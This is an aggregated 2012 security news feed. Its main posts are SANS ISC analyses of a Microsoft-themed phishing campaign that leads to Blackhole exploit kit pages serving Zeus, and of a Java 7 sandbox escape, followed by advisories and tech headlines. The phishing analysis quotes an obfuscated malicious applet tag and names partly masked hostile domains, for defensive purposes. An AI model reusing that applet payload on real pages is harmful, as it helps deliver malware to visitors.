InfoSec News

Thanks to Susan Bradley for reporting this to ISC.
We're receiving multiple reports of a phishing campaign using the template from a legitimate Microsoft email regarding Important Changes to Microsoft Services Agreement and Communication Preferences.
The legitimate version of this email is specific to a services agreement seen here, per a change to Microsoft services as of 27AUG.
The evil version of this email will subject victim to a hyperlink that will send them to a Blackhole-compromised website, which will in turn deliver a fresh Zeus variant.
I'll walk you though the full sample set I analyzed. Susan sent us an email including the following header snippet:
Received: from [] ([]) by

inbound94.exchangedefender.com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166
A legitimate header snippet:
Received: from smtpi.msn.com ([]) by COL0-MC3-F43.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900) is in China, is Microsoft.
The legitimate email will include a hyperlink for http://email.microsoft.com/Key-9850301.C.DLs15.C.KK.DlNkNK, which points to the above mentioned services agreement.
Obfuscated to protect the innocent: The phishing mail will instead include a hyperlink to the likes of allseasons****.us, radiothat****.com, and likely a plethora of others. I assessed radiothat****.com and was redirected to 209.x.y.14 which is running the very latest Blackhole evil as described on 28 AUG by Websense in this post.
Source code review of the web page served included applet/code=ndshesa.ndshesf/archive=Leh.jarparam/nam=123 name=uid value=N013:011:011:04:037:061:061:047:034:076:074:0102:076:074:047:047:047:074:067:053:061:04:074:04:013:04:075:054:071:034:067:053:034:034:02:065:071:034//applet
The VirusTotal link for Leh.jar is here, and the VirusTotal link for the Zeus variant offered is here.

Hover over hyperlinks and ensure they are directing you to legitimate sites before clicking. Be cautious even thereafter.
Contemplate disabling Java until the next update is released.
Review email headers if in doubt for messages you receive that seem suspicious.
Keep your antimalware signatures up to date. While limited at the moment, detection for both the Java exploit and the Zeus variant is increasing.

Ping us with questions or comments, as well as anything you'd like to share regarding similarly received emails from this phishing campaign.
Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
IBM and Oracle shared more details this week about new RISC chips they're building for server customers, the Power7+ in the case of IBM and the T5 for Oracle.
Facebook is tweaking its development platform to allow third-party applications to communicate directly with their users by sending notifications to their profiles.
Secure.me has launched a website and a browser plug-in designed to make Facebook users aware of the personal information that gets harvested by third-party applications.
unixODBC 'SQLDriverConnect()' 'FILEDSN' and 'DRIVER' Options Buffer Overflow Vulnerabilities
Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities
Rugged Operating System Private Key Disclosure Vulnerability
Mobile startup Ting, which delivers its voice, text and data offerings over Sprint Nextel's network, has become the newest LTE service provider by shipping its first device that uses the fast 4G technology.
Boehm GC malloc()' and 'calloc()' Multiple Buffer Overflow Vulnerabilities
Security advisory for Bugzilla 4.3.3, 4.2.3, 4.0.8 and 3.6.11
Polish security firm Security Explorations has sent an advisory, with a proof-of-concept exploit, to Oracle today (Friday 31 AUG) specific to a vulnerability they discovered in the Java 7 security update released Thursday. This newly reported vulnerability can be exploited to escape the Java sandbox and execute arbitrary code on the underlying system.

Standby for more on this one, no word yet from Oracle regarding their remediation plans.
As Rapid7's Tod Beardsley has said: As it happens, very few websites rely on Java for dynamic content. Java isn't relied on nearly as much as Javascript and Flash. Most people can disable their Java browser plugin and not really notice the difference.
What mitigations are you utilizing to protect yourselves? Going so far as disabling Java all together? Feedback welcome via comments.
See Scott's post from yesterday for the original advisory details.
Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
TYPO3 Core TYPO3-CORE-SA-2012-004 Multiple Remote Security Vulnerabilities
[SE-2012-01] New security issue affecting Java SE 7 Update 7
VMSA-2012-0013 VMware vSphere and vCOps updates to third party libraries
AST-2012-013: ACL rules ignored when placing outbound calls by certain IAX2 users
AST-2012-012: Asterisk Manager User Unauthorized Shell Access
Microsoft will allow users of Windows 8 Pro to downgrade their new PCs to Windows 7 or even Vista, according to the operating system's licensing agreement.
Security researchers from Poland-based security firm Security Explorations claim to have discovered a vulnerability in the Java 7 security update released Thursday that can be exploited to escape the Java sandbox and execute arbitrary code on the underlying system.
The enterprise software market on Thursday suddenly got an intimate look inside Workday, a red-hot startup that makes cloud applications for human resources and financials, with the public release of its S-1 IPO filing.
Security researchers from Poland-based security firm Security Explorations claim to have discovered a vulnerability in the Java 7 security update released Thursday that can be exploited to escape the Java sandbox and execute arbitrary code on the underlying system.
China's Huawei is previewing its new Android-based user interface, called Emotion UI, and has unveiled new devices at the IFA consumer electronics show in Berlin, including two new tablets that are arriving in select markets.
Samsung Electronics' Galaxy Camera, introduced at this week's IFA consumer electronics show in Berlin, takes clear, colorful images but is buggy and slow.
Using the slim evidence of new device identifiers, the developer of the popular Instapaper software yesterday speculated that Apple's long-rumored "iPad Mini" will include some of the same components as the low-priced iPad 2 tablet.
Dell and VMware have partnered to offer a rack-mountable pre-configured system to support VDI environments.
Agent Dash is a gesture-based action game that puts you in the well-polished shoes of an international spy. The object of the game from Full Fat is similar to side-scrolling platformer Robot Unicorn Attack--you need to prolong gameplay for as long as possible without hitting an obstacle. Death is inevitable and how long you're able to dodge rocks, pits, and death traps is a matter of skill and timing.
Samsung's newest iteration of the Galaxy Note smartphone-tablet hybrid has a large, bright screen, more powerful battery and a snappy processor. One of the few drawbacks found in using it at the IFA consumer electronics show in Berlin is that it might not fit in your pocket.
In the ongoing race to build ever better flat-screen displays, a potentially disruptive technology has made a small debut at IFA, the consumer electronics show currently taking place in Berlin.
Wireshark DRDA Dissector 'dissect_drda()' Denial of Service Vulnerability
Oracle Java SE CVE-2012-1721 Remote Java Runtime Environment Vulnerability
CSA will work with Fujitsu Laboratories of America on best practices, standards for securing big data.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
As the Bring Your Own Device trend gains traction, Dell and EMC/Cisco are taking different approaches to desktop virtualization. Generally, Dell aims for PC users in the midmarket, while the EMC/Cisco partnership may work better for enterprises that have to consider the iPad. Both tacks are worth a look, though.
VMware released one new security advisory, and updated 2 older once.
New: VMSA-2012-0013 [1]
The update affects vCenter (and Update Manager)4.1 without Update 3, as well as ESX/ESXi. It patches a number of open source components that are included as part of VMware: Apache struts, popt/rpm, glibc, libxm2, Perl, OpenSSL, JRE and the Linux Kernel.
An interesting update is the update of Java, which is included in ESX. Some of the older versions of ESX and vCenter still use Java 1.5, which was left out of the recent issues. However, for those VMware products that do use Java 1.6, only update 31 is provided. As of yesterday, Update 35 is current.
VMSA-2012-0005.2 [2]: Added Windows 7 information

VMSA-2012-0012.1 [3]: included information about vSphere 4.1 U3

[1] http://www.vmware.com/security/advisories/VMSA-2012-0013.html



Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
South Korea is about to upgrade its defensive and offensive measures in the cyber war against North Korean hackers. Among other things, the number of service personnel at the country's "Cyber Command" is to be doubled to 1,000

Twitter will allow advertisers to target users based on their interests following a successful test of a new advertising feature, the company said on Thursday.
When the campaign is all-digital, who's in charge -- marketing or IT? Here are 4 ways to divide the work and keep the peace. Insider (registration required)
Google said it is shutting down its online marketplace for TV ads, and will focus instead on web advertising including its own Google TV, it said Thursday.
A $850 million deal between Taiwanese electronics giant Hon Hai Precision Industry and Japan's Sharp was still on hold Friday, as roller-coaster negotiations continued without the head of Hon Hai, who reportedly cut short his trip to Japan.
Retailer Walmart has rolled out a new search engine based on semantic search technology that helps users find items on its website and delivers results based on their interests and likely intent.
A test by heise Security demonstrates how important it is to install the Java update that has just been released. Most virus scanners don't offer reliable protection against web pages that exploit critical Java holes to manipulate a system without permission

Version 13.0.1 of Photoshop addresses a critical heap-based buffer overflow vulnerability in CS6 that could be exploited by an attacker to take control of an affected system

The company has released Java 7 Update 7 with fixes to block the vulnerabilities which allowed attackers to completely disable the Java security model

Posted by InfoSec News on Aug 31


By Kyle Murphy, PhD
EHR Intelligence
August 28, 2012

In a press release today, Cancer Care Group (Indianapolis, IN) announced
that a laptop computer containing its computer server backup media was
stolen from an employee’s locked care on July 19, 2012. The breach has
potentially exposed the protected health information (PHI) or...

Posted by InfoSec News on Aug 31


By Dan Goodin
Ars Technica
Aug 30 2012

One of the world's biggest producers of liquefied natural gas has been
hit by a malware attack that has taken down its website and e-mail
servers. This is the second documented computer attack to hit a large
energy company this month.

Officials with Qatar-based RasGas first identified an "unknown...

Posted by InfoSec News on Aug 31


BBC News Asia
30 August 2012

A US man who worked as a guard at a US consulate in China has pleaded
guilty to trying to sell secret information to the Chinese government.

Bryan Underwood, 32, worked at the consulate in the southern city of
Guangzhou between 2009 and 2011.

He was accused of writing to China's ministry of state security,
offering to provide photographs and details of security...

Posted by InfoSec News on Aug 31


By Mathew J. Schwartz
August 30, 2012

Beware of a "major flaw" in the UPEK Protector Suite software that's
been preinstalled on many laptops with built-in UPEK fingerprint

That warning comes from ElcomSoft, a Russian provider of
encryption-cracking software.

"After analyzing a number of...

Posted by InfoSec News on Aug 31


By Jaikumar Vijayan
August 30, 2012

A senior Democratic lawmaker is urging President Barack Obama to issue
an executive order aimed at protecting the nation's critical
infrastructure against cyber threats.

In an open letter to the President on Tuesday, Sen. Dianne Feinstein
(D-Calif.) called on Obama to use...
Google has released an update to the 21.x branch of its Chrome browser, closing a total of nine security holes including three high-severity problems

A Tokyo court ruled Friday that Samsung did not infringe an Apple patent in a locally filed lawsuit, a minor victory for Samsung in the ongoing legal battles between the two companies.
Internet Storm Center Infocon Status